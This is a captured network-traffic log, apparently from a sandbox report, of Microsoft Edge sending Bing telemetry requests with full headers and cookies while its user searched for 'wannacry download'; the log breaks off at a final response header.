cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491ed93
GET

https://www.bing.com/fd/ls/GLinkPing.aspx?IG=F2060D51DCE5445385C918F99F2EF2FE&ID=autosuggest,5007.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:2378}

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/GLinkPing.aspx?IG=F2060D51DCE5445385C918F99F2EF2FE&ID=autosuggest,5007.1&PR={%22i%22:%22m%22,%22ghc%22:1,%22et%22:2378} HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491ed94
GET

https://www.bing.com/fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacry%20download%2Ci%3A27%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199056958%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=B7E570A9AE8C45A28F4A27F1C0C7A0D7&TYPE=Event.ClientInst&DATA=%5B%7B%22Meta%22%3A%22q%3Awannacry%20download%2Ci%3A27%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1729199056958%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=one+a+cry+malware&FORM=AWRE
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491efa8
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:5,%22BC%22:381,%22SE%22:-1,%22TC%22:-1,%22H%22:457,%22BP%22:629,%22CT%22:629,%22IL%22:11},%22ad%22:[-1,-1,1263,601,1263,4729,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&Type=Event.CPT&DATA={%22pp%22:{%22S%22:%22L%22,%22FC%22:5,%22BC%22:381,%22SE%22:-1,%22TC%22:-1,%22H%22:457,%22BP%22:629,%22CT%22:629,%22IL%22:11},%22ad%22:[-1,-1,1263,601,1263,4729,0],%22net%22:%22undefined%22}&P=SERP&DA=DUBE01 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491efa9
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

92.123.128.172:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 350
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3732&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491efaa
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199057722%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%229.35%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199057722%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199057738%2C%22Name%22%3A28851%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057738%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057740%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1729199057722%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%229.35%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1729199057722%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1729199057738%2C%22Name%22%3A28851%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057738%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057740%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Thu, 17 Oct 2024 21:04:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.c2777b5c.1729199058.1491f148
GET

https://www.bing.com/fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057744%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D

msedge.exe

Remote address:

92.123.128.172:443

Request

GET /fd/ls/l?IG=D607FEFA2831486BA34E9C5873B1B63C&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1729199057744%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DARKMODE%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=wannacry+download&qs=LS&pq=wannacry+&sk=LS1&sc=12-9&cvid=B7E570A9AE8C45A28F4A27F1C0C7A0D7&FORM=QBRE&sp=2&ghc=1&lq=0
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=8D0CF1AB09A14B57B942FE4AC5B64882&dmnchg=1
cookie: ak_bmsc=42E0BC7E9B56E9700FC73BAFAD98CD83~000000000000000000000000000000~YAAQwnd7XASoJoySAQAAoClLnBn4/Oe4atAdn24PkmiirmlhIAjye/oJKfDwspUBz1UNE8cAK+sKjl17y+kIiXLB9LOznsDwwrmTiZmP6nqgeDiMbaXQeJeomWFE69hGxgo9SJ7Fgd40m6ft6ZZijGCGRg1wZmM/47loHNLRIveuUizeYjDBCyXE8yhrpyiJnyVM1kFr8kNBQJHDNn5w5ZlcROVOWOgROY8+IEE7ow2tRCamJUJOFry9zMq6sxKdKfXob+stHPDGf4yZ7dBNUxHejTZomeEo/heleMqbG1yRXoR5YWRsYO6pOVWLZM0bOYjzxylVS6fuOlF7rtiAyxQYp8afwVY8HWkCnGncR0yLDyaT63DCK4CoNOhdVbCNLeAFHW3tcKU=
cookie: MUIDB=3038AD7D4D4F6C932B24B8664CD86DBE
cookie: SRCHUSR=DOB=20241017&T=1729199024000
cookie: _Rwho=u=d&ts=2024-10-17
cookie: ipv6=hit=1729202627525&t=4
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-10-17T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-17T21:03:50.5027410+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&R=6&RB=0&GB=0&RG=200&RP=3
cookie: dsc=order=ShopOrderDefault
cookie: USRLOC=HS=1&ELOC=LAT=52.47917556762695|LON=-1.9018261432647705|N=Birmingham%2C%20West%20Midlands|ELT=1|&BLOCK=TS=241017210351
cookie: _EDGE_S=F=1&SID=03D76D5C9A2B6ED61E1C78479BBC6F8B&mkt=en-gb
cookie: bm_sv=78702088DDF133A7361DD4A7B52E9EBD~YAAQwnd7XNOpJoySAQAAFqtLnBkt3ilHCmKY/0kyVcez1I56NLESCkrhP0Q6hlCo5VeR5flwMP6fibswKJWECtyIr5l59OpT3U+pYvAIkvhcXAbliiLtiGXyyHoe3X2XY1yy+dDPx0U8fOQF10aMuG7msAr4ITnxtEaVuA++4buGCBesrakKgSUe8gVf4wA+EiLitc+SOXieH6pZ5r4dU67RI7MPRb2AcVJbQNfPGJCDMRo882+aO0/jJnN1HQ==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=4669&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1729199031&WTS=63864795824

Response

